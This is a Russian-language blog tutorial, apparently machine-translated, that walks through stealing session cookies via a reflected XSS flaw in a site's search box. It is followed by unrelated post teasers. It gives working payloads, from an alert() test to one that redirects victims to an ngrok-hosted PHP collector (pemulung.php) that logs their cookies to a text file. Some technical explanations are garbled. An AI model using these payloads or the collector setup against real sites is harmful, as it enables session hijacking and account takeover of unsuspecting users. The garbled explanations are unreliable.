Привет всем :), здесь я продемонстрирую получение cookies, которые будут сохранены в виде txt файла, используя дефект XSS Reflected.
Ранее, что такое XSS? XSS расшифровывается как Cross-site Scripting, что представляет собой атаку путем внедрения вредоносного кода, который может получать cookies пользователя. Очень смертельным типом атаки является xss-хранилище, когда вредоносный код внедряется в систему, и код будет постоянно отправлять cookies посетителей хакерам.
Хорошо, следующим шагом я попробую сделать тест сначала на всех полях ввода, которые могут получить недостаток xss
Теперь здесь я попробую проверить раздел поиска
После того, как я ввел текст, оказалось, что текст выводится в секции inspect element
На следующем этапе я проведу тестирование, и это я буду делать шаг за шагом.
Получается, что после того, как я добавлю закрытие и открытие в начале и конце команды html-инъекции
"><img src=x onerror=alert(1)><"
Получается, что она может отобразить xss уязвимость, которая помечена всплывающим окном, успешно отображенным.
Итак, способ, которым работает моя html-инъекция, заключается в том, что когда src или источник img или изображения отсутствует, то выполняется команда onerror, которая запускает предупреждение, отображающее всплывающее окно из javascript, содержащее значение номер 1. Позже мы изменим это значение section.....
> в начале и <" в конце полезны для того, чтобы html-код, который я ввожу, не читался как текст.
Проблема в том, что если не поставить заглавную букву в начале и в конце, то html-команда, которую я ввожу, будет прочитана как текст и не сможет выполниться.
Далее я попытался выполнить команду для получения cookies
"><img src=x onerror=alert(document.cookie)><"
Далее мы сначала настроим ngrok, чтобы наш локальный сервер был доступен онлайн
Итак, я запускаю ngrok в cmd, и активирую локальный сервер командой
Ngrok http 80
Итак, локальный ip-сервер может быть доступен публично, подождите... Не забудьте сначала проверить, активирован ли локальный веб-сервер или нет.
Здесь я использую Xampp и активировал веб-сервер Apache.
После этого, пожалуйста, проверьте сначала доступ к локальному веб-серверу публично
После этого появится вот такой вид, затем нажмите посетить сайт
Здесь я уже могу получить доступ к файлам на моем локальном веб-сервере, и пришло время действовать.....
Здесь я подготовил php файл, содержащий код для получения cookies, которые я позже сохраню в txt виде
Итак, объяснение следующее,
C - это контейнер cookie, который будет вызван из команды html-инъекции позже
$_GET - метод http-запроса
$cookie - переменная, в которой хранятся методы и файлы cookie
Cookielog.txt - это txt-файл, в котором будет храниться информация о куках в виде текста
A - это своего рода временная переменная, место для записи каждого куки.
Fopen - это функция ассоциативного массива, полезная для открытия файла cookielog.txt и a
$file - переменная
Fwrite - функция для записи информации из $cookie в $file, а в $cookie будет добавлена \n\n\n информация для ввода 2x или как разделитель для каждой cookie
Я сохраняю файл с именем pemulung.php, доступ к которому впоследствии будет осуществляться с помощью ngrok
"><img src=x onerror=alert(document.location="https://157b-36-68-222-204.ap.ngrok.io/wkwk/pemulung.php?c="+document.cookie)><"
После того, как я введу код выше, cookie будет сохранен в файле cookielog.txt
А вот как это выглядит в браузере
Тогда отображение на body не будет отображать никакого содержимого и будет отображать только head, и уж точно не стоит ожидать, что мы увидим отображение формы на элементе inspect... Проблема здесь в том, что веб будет писать в соответствии с кодом, который я инжектировал ранее.....
Таким образом, можно сделать вывод, что если команда, которую мы ввели, успешна, то ответ будет равен 200, что можно увидеть в http-запросе ngrok. Если мы выполним инъекцию много раз, то cookielog.txt будет заполнен таким количеством cookies, сколько раз мы выполним инъекцию.
На этом все спасибо, прошу извинить за возможные недочеты. Как обычный человек, я хотел бы выразить свою глубочайшую благодарность... :) :) :) :)
20.08.2023 18:21
Привет всем, сегодня я хочу высказать свои соображения по поводу вопроса, который я уже много раз получал в своем сообществе: "Стоит ли изучать PHP в 2023-2024 годах? Или это полная лажа?".
20.08.2023 17:46
В JavaScript одним из самых запутанных понятий является поведение ключевого слова "this" в стрелочной и обычной функциях.
19.08.2023 18:39
Здравствуйте, друзья-студенты! Готовы совершенствовать свои навыки веб-дизайна? Сегодня в нашем путешествии мы рассмотрим приемы CSS-верстки - в частности, магию поплавков и гибкость flexbox.
19.08.2023 17:22
В системе управления состояниями ngrx, совместимой с Angular 16, появились функциональные эффекты. Это здорово и делает код определенно легче для чтения благодаря своей простоте. Кроме того, мы всегда хотим проверить самые последние возможности в наших проектах!
18.08.2023 20:33
Локализация - это процесс адаптации приложения к различным языкам и культурным требованиям. Это позволяет пользователям получить опыт, соответствующий их языку и культуре.
14.08.2023 14:49
Листовые узлы системы типов GraphQL называются скалярами. Достигнув скалярного типа, невозможно спуститься дальше по иерархии типов. Скалярный тип предназначен для представления неделимого значения.